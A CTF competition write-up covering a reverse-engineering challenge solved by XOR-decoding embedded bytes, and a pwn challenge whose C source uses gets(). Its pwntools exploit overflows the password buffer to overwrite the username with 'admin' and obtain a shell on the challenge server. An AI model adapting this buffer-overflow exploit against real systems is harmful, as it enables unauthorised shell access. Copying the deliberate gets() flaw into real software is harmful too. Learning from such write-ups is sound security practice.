DownUnder CTF 2025 Write-up

Before Everything

In this competition, I played with Team QnQSec.

cert:

Reverse

zeus

First, I looked at the main function:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v4[5]; // [rsp+10h] [rbp-90h] BYREF
  __int64 v5[3]; // [rsp+38h] [rbp-68h]
  __int64 v6; // [rsp+50h] [rbp-50h]
  __int64 v7; // [rsp+58h] [rbp-48h]
  __int64 v8; // [rsp+60h] [rbp-40h]
  __int64 v9; // [rsp+68h] [rbp-38h]
  __int64 v10; // [rsp+70h] [rbp-30h]
  __int64 v11[3]; // [rsp+78h] [rbp-28h]
  const char *v12; // [rsp+90h] [rbp-10h]
  char *s2; // [rsp+98h] [rbp-8h]

  s2 = "To Zeus Maimaktes, Zeus who comes when the north wind blows, we offer our praise, we make you welcome!";
  v12 = "Maimaktes1337";
  v6 = 0xC1F1027392A3409LL;
  v7 = 0x11512515C6C561DLL;
  v8 = 0x5A411E1C18043E08LL;
  v9 = 0x3412090606125952LL;
  v10 = 0x12535C546E170B15LL;
  v11[0] = 0x3A110315320F0ELL;
  *(_DWORD *)((char *)v11 + 7) = 1313495552;
  if ( argc == 3 && !strcmp(argv[1], "-invocation") && !strcmp(argv[2], s2) )
  {
    puts("Zeus responds to your invocation!");
    v4[0] = v6;
    v4[1] = v7;
    v4[2] = v8;
    v4[3] = v9;
    v4[4] = v10;
    v5[0] = v11[0];
    *(_DWORD *)((char *)v5 + 7) = *(_DWORD *)((char *)v11 + 7);
    xor((__int64)v4, (__int64)v12);
    printf("His reply: %s\n", (const char *)v4);
  }
  else
  {
    puts("The northern winds are silent...");
  }
  return 0;
}

As we can see:

v6 = 0xC1F1027392A3409LL; //8 bytes
v7 = 0x11512515C6C561DLL; //8 bytes
v8 = 0x5A411E1C18043E08LL; //8 bytes
v9 = 0x3412090606125952LL; //8 bytes
v10 = 0x12535C546E170B15LL; //8 bytes
v11[0] = 0x3A110315320F0ELL; //7 bytes
*(_DWORD *)((char *)v11 + 7) = 1313495552; //4 bytes

// 8×5 + 7 + 4 = 51 bytes (0x33)

Then I examined the xor function to see how it works:

unsigned __int64 __fastcall xor(__int64 a1, __int64 a2)
{
  unsigned __int64 result; // rax
  unsigned __int64 i; // [rsp+28h] [rbp-8h]

  for ( i = 0LL; ; ++i )
  {
    result = i;
    if ( i >= 0x33 )
      break;
    *(_BYTE *)(a1 + i) ^= *(_BYTE *)(i % 0xD + a2);
  }
  return result;
}

And we can see:

if ( i >= 0x33 )
    break;

It repeats 51 times.

*(_BYTE *)(a1 + i) ^= *(_BYTE *)(i % 0xD + a2);

It uses a key to XOR:

data[i] ^= key[i % 13]

Where key = "Maimaktes1337"

Final exploit:

#!/usr/bin/env python3

encrypted_data = []

v6 = 0xC1F1027392A3409
v7 = 0x11512515C6C561D
v8 = 0x5A411E1C18043E08
v9 = 0x3412090606125952
v10 = 0x12535C546E170B15
v11_0 = 0x3A110315320F0E
v11_remainder = 1313495552 

def int64_to_bytes(value, num_bytes=8):
    return [(value >> (8 * i)) & 0xFF for i in range(num_bytes)]

encrypted_data.extend(int64_to_bytes(v6))
encrypted_data.extend(int64_to_bytes(v7))
encrypted_data.extend(int64_to_bytes(v8))
encrypted_data.extend(int64_to_bytes(v9))
encrypted_data.extend(int64_to_bytes(v10))
encrypted_data.extend(int64_to_bytes(v11_0, 7))  
encrypted_data.extend(int64_to_bytes(v11_remainder, 4))  

key = "Maimaktes1337"
key_bytes = [ord(c) for c in key]

print(f"Encrypted data length: {len(encrypted_data)} bytes")
print(f"Key: {key} (length: {len(key_bytes)} bytes)")
print(f"Encrypted data (hex): {' '.join(f'{b:02x}' for b in encrypted_data)}")

decrypted = []
for i in range(len(encrypted_data)):
    if i >= 0x33: 
        break
    decrypted_byte = encrypted_data[i] ^ key_bytes[i % len(key_bytes)]
    decrypted.append(decrypted_byte)

decrypted_message = ''.join(chr(b) for b in decrypted if b != 0)

print(f"\nDecrypted message: '{decrypted_message}'")

Pwn

corporate-cliche

First, we can examine the code:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void open_admin_session() {
    printf("-> Admin login successful. Opening shell...\n");
    system("/bin/sh");
    exit(0);
}

void print_email() {
    printf(" ______________________________________________________________________\n");
    printf("| To:      all-staff@downunderctf.com                                  |\n");
    printf("| From:    synergy-master@downunderctf.com                             |\n");
    printf("| Subject: Action Item: Leveraging Synergies                           |\n");
    printf("|______________________________________________________________________|\n");
    printf("|                                                                      |\n");
    printf("| Per my last communication, I'm just circling back to action the      |\n");
    printf("| sending of this email to leverage our synergies. Let's touch base    |\n");
    printf("| offline to drill down on the key takeaways and ensure we are all     |\n");
    printf("| aligned on this new paradigm. Moving forward, we need to think       |\n");
    printf("| outside the box to optimize our workflow and get the ball rolling.   |\n");
    printf("|                                                                      |\n");
    printf("| Best,                                                                |\n");
    printf("| A. Manager                                                           |\n");
    printf("|______________________________________________________________________|\n");
    exit(0);
}

const char* logins[][2] = {
    {"admin", "🇦🇩🇲🇮🇳"},
    {"guest", "guest"},
};

int main() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    char password[32];
    char username[32];

    printf("┌──────────────────────────────────────┐\n");
    printf("│      Secure Email System v1.337      │\n");
    printf("└──────────────────────────────────────┘\n\n");

    printf("Enter your username: ");
    fgets(username, sizeof(username), stdin);
    username[strcspn(username, "\n")] = 0;

    if (strcmp(username, "admin") == 0) {
        printf("-> Admin login is disabled. Access denied.\n");
        exit(0);
    }

    printf("Enter your password: ");
    gets(password);

    for (int i = 0; i < sizeof(logins) / sizeof(logins[0]); i++) {
        if (strcmp(username, logins[i][0]) == 0) {
            if (strcmp(password, logins[i][1]) == 0) {
                printf("-> Password correct. Access granted.\n");
                if (strcmp(username, "admin") == 0) {
                    open_admin_session();
                } else {
                    print_email();
                }
            } else {
                printf("-> Incorrect password for user '%s'. Access denied.\n", username);
                exit(1);
            }
        }
    }
    printf("-> Login failed. User '%s' not recognized.\n", username);
    exit(1);
}

We can see that the open_admin_session function contains /bin/sh:

void open_admin_session() {
    printf("-> Admin login successful. Opening shell...\n");
    system("/bin/sh");
    exit(0);
}

Seeing gets(password); in the main function, we know we can achieve a buffer overflow. We need to reach the open_admin_session function, but there’s an interesting part: when we input the username, we can’t input "admin".

As we can see, this code performs strcmp twice:

if (strcmp(password, logins[i][1]) == 0) {
    printf("-> Password correct. Access granted.\n");
    if (strcmp(username, "admin") == 0) {
        open_admin_session();

So we need to use the password buffer overflow to overwrite the username to "admin" so we can access the open_admin_session function.

Exploit:

from pwn import *

p = remote('chal.2025-us.ductf.net', 30000)

p.recvuntil(b'Enter your username: ')
p.sendline(b'guest')

p.recvuntil(b'Enter your password: ')

admin_pass = bytes.fromhex('f09f87a6f09f87a9f09f87b2f09f87aef09f87b3') # the emoji code Bytes UTF-8

payload = admin_pass + b'\x00' * (32 - len(admin_pass))
payload += b'admin\x00' + b'\x00' * (32 - 6) 

p.sendline(payload)

p.interactive()

After all

A fun competition